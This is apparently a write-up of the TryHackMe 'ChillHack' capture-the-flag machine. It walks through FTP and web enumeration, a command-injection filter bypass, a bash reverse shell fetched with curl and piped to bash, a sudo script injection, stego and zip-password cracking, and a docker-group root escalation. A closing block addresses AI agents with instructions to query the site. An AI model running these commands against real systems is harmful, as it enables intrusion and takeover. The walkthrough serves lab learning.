# ChillHack ![](/files/-MbgrjbBAYZC9550rdXe) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.161.202 ``` ![](/files/-Mbgsi7fqW0fSqvwR6Gr) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 21,22,80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 21,22,80 -oN nmap 10.10.161.202 ``` ![](/files/-Mbgsu3ZMttkFXYT1YtP) ## Enumeration ### Port 21: FTP We see in the nmap scan that Anonymous FTP login is allowed, so lets login ``` ftp 10.10.161.202 ``` ![](/files/-MbgtEZlmQanVtn1715_) Listing the files we see that there is a `note.txt` file so lets transfer this file to our machine. ``` get note.txt ``` ![](/files/-Mbgtd83fm5rnfUNQD1r) Lets read `note.txt` ![](/files/-Mbgts6o7C-2IFOlkY8y) We have two usernames, `Anurodh` and `Apaar` , lets add this to our notes. ![](/files/-MbguVT6gkK09yU0nOKc) We also see that there is some filtering on strings being put in the command, which we might encounter while enumerating this machine further. ### Port 80: HTTP Lets visit the site. ![](/files/-Mbgv0GPOgZyIpzVMVHL) Looks like a very well made website, lets run gobuster to find hidden directories while we explore the webpage. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.161.202 ``` I looked through the website and found nothing interesting in the source code too, after a while I got the results for the gobuster scan ![](/files/-MbgwAIdVoNj6YOyIbdo) Lets visit this `/secre`t directory. ![](/files/-MbgwMGb2ET0S-yNVbL2) Looks like we can execute commands, lets try executing a basic command. When I tried executing `ls` it gave me this. ![](/files/-MbgwWYh3WLEeUjn-oJB) Now looking back at the `note.txt`, it mentioned that there was filtering on the commands, so to bypass that I remembered there was a way we could bypass filtering, we can do this by using backslashes in the command. We are no escaping any special characters so then the word will be interpreted the same way by bash. Lets try `l\s`. ![](/files/-Mbgx76CTDK4aFcfEOLl) And it worked so now lets check the index.php page which will tell us what characters and words are being filtered. ``` c\at index.php ``` After executing the look at the source code. ![](/files/-MbgyQyqsSI6hwUKghzg) We have a list of words that have been blacklisted which means that we cannot use them on the system, also we can see the function that allows command injection. Lets now try to get a reverse shell on the machine. ## Exploitation * First we create a bash reverse shell * Second we transfer it to the victim machine by starting a http server on our machine and using the curl command * Finally once the file is downloaded we can start a netcat listener and execute the file we transferred to get a reverse shell on the machine. First we create a bash reverse shell called `shell.sh` ``` bash -c "bash -i >& /dev/tcp//1234 0>&1" ``` Now we start a http server ``` python3 -m http.server 8000 ``` ![](/files/-Mbh-tkwPh5xyUhJpTd5) Lets also start a netcat listener. ``` nc -lvnp 1234 ``` ![](/files/-Mbh0PHn8pJs-UP4TqVn) Now we download the file on the victim machine using curl and then execute is using bash in the same command. We are using a backslash in bash as it has been blacklisted. ``` curl :8000/shell.sh | ba\sh ``` After executing the command, we get a reverse shell. ![](/files/-Mbh1E2DT9mUVBa18v5F) Lets now stabilize the shell. ```bash python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo; fg reset Ctrl + C ``` ![](/files/-Mbh2BO329jWVxKDc5rN) ## Privilege Escalation Looking at the files in the system, we did not have permissions to read most of them, so lets run a automatic enumeration script called `linpeas`, you can find this google, once you download it we have to transfer to this machine. ![](/files/-Mbh7OCFUb-cA6ovegF0) We already have a http server running, if you switched it off, start is up again. ![](/files/-Mbh4RJ_E4eJhbInRSWn) Now we have to go the `/tmp` directory as we are not allowed to download files in other directories and usually `/tmp` always gives us permissions to download files into its directory. ```bash wget http://:8000/linpeas.sh ``` ![](/files/-Mbh7XTstnupFcXu3iBJ) Before this lets run `sudo -l` to see what we can run as other users. ![](/files/-Mbh8EZUUXFp4Lxkek2G) Looks like we can run a script file, lets read it. ![](/files/-Mbh8QNWqFMHY_tXquvU) Looking at the script, it looks like it is vulnerable to command injection as there are no filters. And this file is owned by Apaar, we can try running it and execute a bash shell and get a bash instance as the user Apaar. Lets first run the file and then type `/bin/bash` to get a shell as Apaar and then stabilize the shell. ```bash sudo -u apaar /home/apaar/.helpline.sh /bin/bash python3 -c 'import pty; pty.spawn("/bin/bash")' ``` ![](/files/-MbhAgAXnSQJy2GzkKnJ) We are now the user Apaar. We can read the User flag now in `Apaar's` home directory. ![](/files/-MbhAydgg2VRjLn-JVeL) Now I tried running linpeas but It did not work so I had to find another way to privilege escalate and that is when I found an interesting files in `/var/www/files`. ![](/files/-MbhCRxjYPXIovXxSYMT) Lets read these files #### hacker.php ![](/files/-MbhCUcdLXG-M9qxUWIL) This looks like it is displaying a image file and there is a message which is telling that there might be something in the image file . Lets download this file, before that lets explore the other files. #### `account.php` ![](/files/-MbhCpW5kqHno8OFbDLt) This looks like a login page. #### `index.php` ![](/files/-MbhCyFtrKrQu57dX4AV) In this file we see the credentials for the SQL database running on this machine. Lets now download the image file we found in hacker.php, first lets go to the directory in which the file is present. ![](/files/-MbhE1NLleUHxvaDNRe2) Lets start a http server on this machine. ```bash python3 -m http.server 8000 ``` ![](/files/-MbhEPk4_18xV6Id7at-) Now lets download the file onto our machine ```bash wget http://10.10.161.202:8000/hacker-with-laptop_23-2147985341.jpg ``` ![](/files/-MbhEk_v_GGisG9mHBTW) Now lets look at the file ![](/files/-MbhFJv-6EDvqBReGYad) Lets use steghide to look for hidden information in the file. (Click enter for the password) ```bash steghide info hacker-with-laptop_23-2147985341.jpg ``` ![](/files/-MbhFd-_9akS_JEyrJkM) We see a zip file, lets extract it using `steghide`. ```bash steghide --extract -sf hacker-with-laptop_23-2147985341.jpg ``` ![](/files/-MbhFvg4jECUkyHH99ct) Lets unzip this zip file that we got. ```bash unzip backup.zip ``` ![](/files/-MbhH1vh1ksBqdq3aUnP) Looks like we need a password, we can use `zip2john` and then `john the ripper` to find the password. ```bash zip2john backup.zip > hash ``` ![](/files/-MbhHV7IKBtaXt9szLxW) Now use john to crack the password ```bash john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` ![](/files/-MbhHpb0WvY066WxxvFD) Now show the password ```bash john hash --show ``` ![](/files/-MbhHvKHpP80b-wwFgou) We have the password. Lets unzip the zip the file ```bash unzip backup.zip ``` ![](/files/-MbhI6w_IBq6q7rNR0ul) Lets read the `source_code.php` file ![](/files/-MbhID92izi5LJXlHamD) Looking through we find the base64 text that is the password for the user `Anurodh`. Lets decode the string. ```bash echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d ``` ![](/files/-MbhIgmBlYnPZ8vaOc9x) We the password, lets now login through ssh. ```bash ssh anurodh@10.10.161.202 ``` ![](/files/-MbhJ0SmFo7lK9bDMVFj) We are now logged in. I was looking through and did not see anything of interest until I ran the command `id`. ```bash id ``` ![](/files/-MbhJGi-HIq46ah4ImZW) Anurodh is part of the docker group. We can find the command to become root on [GTFOBins](https://gtfobins.github.io/gtfobins/docker/#shell). ![](/files/-MbhJnDKkhTrO7vBqS7Q) Lets run this command ```bash docker run -v /:/mnt --rm -it alpine chroot /mnt sh ``` ![](/files/-MbhJz1uVVRfjjYHan-b) We are now root. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/chillhack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.